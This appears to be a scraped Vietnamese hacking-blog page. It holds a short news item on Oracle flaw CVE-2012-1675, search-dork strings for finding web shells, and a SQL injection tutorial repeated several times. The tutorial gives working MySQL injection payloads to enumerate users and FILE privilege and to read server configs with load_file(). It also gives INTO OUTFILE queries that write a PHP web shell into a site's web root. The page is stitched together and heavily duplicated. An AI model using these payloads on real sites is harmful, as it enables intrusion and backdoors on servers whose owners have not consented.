Trong thông báo này, Oracle chỉ đưa ra các phiên bản bị ảnh hưởng là 10gR2 (10.2.0.x), 11gR1 (11.1.0.x) và 11gR2 (11.2.0.x). Tuy nhiên theo Joxean Koret, người phát hiện ra lỗi bảo mật này thì lỗi này có thể khai thác được với các bản Oracle từ 8i trở đi.
Lỗi CVE-2012-1675 đã được Koret phát hiện ra từ năm 2008 và có thông báo gửi đến hãng Oracle. Trong bản vá bảo mật thường lệ hàng quí vào tháng 4/2012 (CPU-Apr-2012), Oracle đã thông báo lỗi bảo mật này đã được khắc phục cùng lời cảm ơn đến Koret. Ngay sau đó, Koret cũng đã công bố tài liệu về cách thức khai thác lỗi cùng bản PoC của mình trên bugtraq. Tuy nhiên, trong email trao đổi giữa Koret và đại diện của Oracle thì Koret mới “ngã ngửa”: Oracle sẽ chỉ đưa ra bản vá chính thức trong phiên bản chính thức kế tiếp của Oracle database (11gR3 hoặc 12g) vì bản thân Oracle cũng thừa nhận, việc khắc phục lỗi này đòi hỏi phải can thiệp rất sâu vào hệ thống của Oracle điều mà các bản CPU định kì không thể thực hiện được. Như vậy lỗi zero-day sau 4 năm phát hiện vẫn là đang là một lỗi zero-day.
Khuyến cáo từ HVA: các quản trị viên của Oracle database nên có kế hoạch thực hiện sớm nhất có thể việc triển khai các phương án tạm thời theo khuyến cáo của hãng.
Tham khảo:
[1] Oracle Security Alert for CVE-2012-1675
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html
[2] Oracle Database new zero day exploit put users at risk
http://thehackernews...ay-exploit.html
Trong thông báo này, Oracle chỉ đưa ra các phiên bản bị ảnh hưởng là 10gR2 (10.2.0.x), 11gR1 (11.1.0.x) và 11gR2 (11.2.0.x). Tuy nhiên theo Joxean Koret, người phát hiện ra lỗi bảo mật này thì lỗi này có thể khai thác được với các bản Oracle từ 8i trở đi.
Lỗi CVE-2012-1675 đã được Koret phát hiện ra từ năm 2008 và có thông báo gửi đến hãng Oracle. Trong bản vá bảo mật thường lệ hàng quí vào tháng 4/2012 (CPU-Apr-2012), Oracle đã thông báo lỗi bảo mật này đã được khắc phục cùng lời cảm ơn đến Koret. Ngay sau đó, Koret cũng đã công bố tài liệu về cách thức khai thác lỗi cùng bản PoC của mình trên bugtraq. Tuy nhiên, trong email trao đổi giữa Koret và đại diện của Oracle thì Koret mới “ngã ngửa”: Oracle sẽ chỉ đưa ra bản vá chính thức trong phiên bản chính thức kế tiếp của Oracle database (11gR3 hoặc 12g) vì bản thân Oracle cũng thừa nhận, việc khắc phục lỗi này đòi hỏi phải can thiệp rất sâu vào hệ thống của Oracle điều mà các bản CPU định kì không thể thực hiện được. Như vậy lỗi zero-day sau 4 năm phát hiện vẫn là đang là một lỗi zero-day.
Khuyến cáo từ HVA: các quản trị viên của Oracle database nên có kế hoạch thực hiện sớm nhất có thể việc triển khai các phương án tạm thời theo khuyến cáo của hãng.
Tham khảo:
[1] Oracle Security Alert for CVE-2012-1675
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html
[2] Oracle Database new zero day exploit put users at risk
http://thehackernews...ay-exploit.html
2012 Dorks & Shell
________________________ [+] ________________________
For Dorks ::
-hack -exploit -dork -honeypot -honeypage -googlehacking
For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
READ MORE »
For Dorks ::
-hack -exploit -dork -honeypot -honeypage -googlehacking
For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
READ MORE »
2012 Dorks & Shell
________________________ [+] ________________________
For Dorks ::
-hack -exploit -dork -honeypot -honeypage -googlehacking
For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
READ MORE »
For Dorks ::
-hack -exploit -dork -honeypot -honeypage -googlehacking
For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic
READ MORE »
Kỹ thuật tấn công sử dụng dumpfile/outfile trong SQL Injection
Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
Chú ý: Tấn công một website mà chưa có sự đồng ý của chủ nhân là vi phạm pháp luật. Bài viết này chỉ mang tính nghiên cứu và học hỏi. Tôi khuyến khích mọi người nên tự cài đặt hệ thống trên máy của mình và thử nghiệm, không nên tấn công phá hoại các site trên thực tế - c0mm3nt 2009
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
1' union select current_user,null/*
hoặc
1' union select user(),null/*
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Username@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được. Các câu lệnh ví dụ:
1' and user() like 'root
1' and mid(user(),1,1)
1' and mid(user(),2,1)>'m
1' and ascii(substring(user(),1,1))>64
.....
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
1' union select file_priv,null from mysql.user where user='username
Chú ý thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất - khi chuyển sang Blind :
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select )
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
0′ union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%
Với blind:
1′ and mid((select is_grantable from information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ thử bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn chính xác đến thư mục/file mà ta muốn ghi file
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ thư mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
0′ UNION SELECT load_file(’a'),null/*
Trong mysql 5 thì có thể union select:
0′ UNION SELECT @@datadir,null/*
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
0′ UNION SELECT database(),null/*
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(), mysql_fetch_row() hoặc các lệnh tương tự. Trong các warning này sẽ hiển thị đườn dẫn đến thư mục web và chúng ta dễ dàng xác định được thư mục để ghi file lên. Các warning này có dạng như
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình. 1 số đường dẫn mặc định đến file cấu hình:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE. Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public. Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Trong một số trường hợp ta cần sử dụng hex và unhex:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php
Đây là 1 số vì dụ:
// PHP SHELL
<? system($_GET['c']); ?>
hoặc passthru nếu muốn
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE('FILENAME') chặn ' thì không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
(Sưu tầm)
Chú ý: Tấn công một website mà chưa có sự đồng ý của chủ nhân là vi phạm pháp luật. Bài viết này chỉ mang tính nghiên cứu và học hỏi. Tôi khuyến khích mọi người nên tự cài đặt hệ thống trên máy của mình và thử nghiệm, không nên tấn công phá hoại các site trên thực tế - c0mm3nt 2009
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
1' union select current_user,null/*
hoặc
1' union select user(),null/*
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Username@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được. Các câu lệnh ví dụ:
1' and user() like 'root
1' and mid(user(),1,1)
1' and mid(user(),2,1)>'m
1' and ascii(substring(user(),1,1))>64
.....
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
1' union select file_priv,null from mysql.user where user='username
Chú ý thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất - khi chuyển sang Blind :
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select )
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
0′ union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%
Với blind:
1′ and mid((select is_grantable from information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ thử bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn chính xác đến thư mục/file mà ta muốn ghi file
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ thư mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
0′ UNION SELECT load_file(’a'),null/*
Trong mysql 5 thì có thể union select:
0′ UNION SELECT @@datadir,null/*
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
0′ UNION SELECT database(),null/*
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(), mysql_fetch_row() hoặc các lệnh tương tự. Trong các warning này sẽ hiển thị đườn dẫn đến thư mục web và chúng ta dễ dàng xác định được thư mục để ghi file lên. Các warning này có dạng như
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình. 1 số đường dẫn mặc định đến file cấu hình:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE. Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public. Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Trong một số trường hợp ta cần sử dụng hex và unhex:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php
Đây là 1 số vì dụ:
// PHP SHELL
<? system($_GET['c']); ?>
hoặc passthru nếu muốn
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE('FILENAME') chặn ' thì không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
(Sưu tầm)
Kỹ thuật tấn công sử dụng dumpfile/outfile trong SQL Injection
Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
Chú ý: Tấn công một website mà chưa có sự đồng ý của chủ nhân là vi phạm pháp luật. Bài viết này chỉ mang tính nghiên cứu và học hỏi. Tôi khuyến khích mọi người nên tự cài đặt hệ thống trên máy của mình và thử nghiệm, không nên tấn công phá hoại các site trên thực tế - c0mm3nt 2009
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
1' union select current_user,null/*
hoặc
1' union select user(),null/*
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Username@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được. Các câu lệnh ví dụ:
1' and user() like 'root
1' and mid(user(),1,1)
1' and mid(user(),2,1)>'m
1' and ascii(substring(user(),1,1))>64
.....
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
1' union select file_priv,null from mysql.user where user='username
Chú ý thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất - khi chuyển sang Blind :
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select )
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
0′ union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%
Với blind:
1′ and mid((select is_grantable from information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ thử bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn chính xác đến thư mục/file mà ta muốn ghi file
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ thư mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
0′ UNION SELECT load_file(’a'),null/*
Trong mysql 5 thì có thể union select:
0′ UNION SELECT @@datadir,null/*
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
0′ UNION SELECT database(),null/*
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(), mysql_fetch_row() hoặc các lệnh tương tự. Trong các warning này sẽ hiển thị đườn dẫn đến thư mục web và chúng ta dễ dàng xác định được thư mục để ghi file lên. Các warning này có dạng như
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình. 1 số đường dẫn mặc định đến file cấu hình:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE. Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public. Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Trong một số trường hợp ta cần sử dụng hex và unhex:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php
Đây là 1 số vì dụ:
// PHP SHELL
<? system($_GET['c']); ?>
hoặc passthru nếu muốn
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE('FILENAME') chặn ' thì không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()Trong bài viết này tôi sẽ đề cập đến câu lệnh "into outfile", 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
(Sưu tầm)
Chú ý: Tấn công một website mà chưa có sự đồng ý của chủ nhân là vi phạm pháp luật. Bài viết này chỉ mang tính nghiên cứu và học hỏi. Tôi khuyến khích mọi người nên tự cài đặt hệ thống trên máy của mình và thử nghiệm, không nên tấn công phá hoại các site trên thực tế - c0mm3nt 2009
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
1' union select current_user,null/*
hoặc
1' union select user(),null/*
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Username@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được. Các câu lệnh ví dụ:
1' and user() like 'root
1' and mid(user(),1,1)
1' and mid(user(),2,1)>'m
1' and ascii(substring(user(),1,1))>64
.....
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
1' union select file_priv,null from mysql.user where user='username
Chú ý thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất - khi chuyển sang Blind :
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select )
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
0′ union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%
Với blind:
1′ and mid((select is_grantable from information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ thử bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn chính xác đến thư mục/file mà ta muốn ghi file
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ thư mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
0′ UNION SELECT load_file(’a'),null/*
Trong mysql 5 thì có thể union select:
0′ UNION SELECT @@datadir,null/*
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
0′ UNION SELECT database(),null/*
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(), mysql_fetch_row() hoặc các lệnh tương tự. Trong các warning này sẽ hiển thị đườn dẫn đến thư mục web và chúng ta dễ dàng xác định được thư mục để ghi file lên. Các warning này có dạng như
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình. 1 số đường dẫn mặc định đến file cấu hình:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE. Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public. Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Trong một số trường hợp ta cần sử dụng hex và unhex:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
0′ AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php
Đây là 1 số vì dụ:
// PHP SHELL
<? system($_GET['c']); ?>
hoặc passthru nếu muốn
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
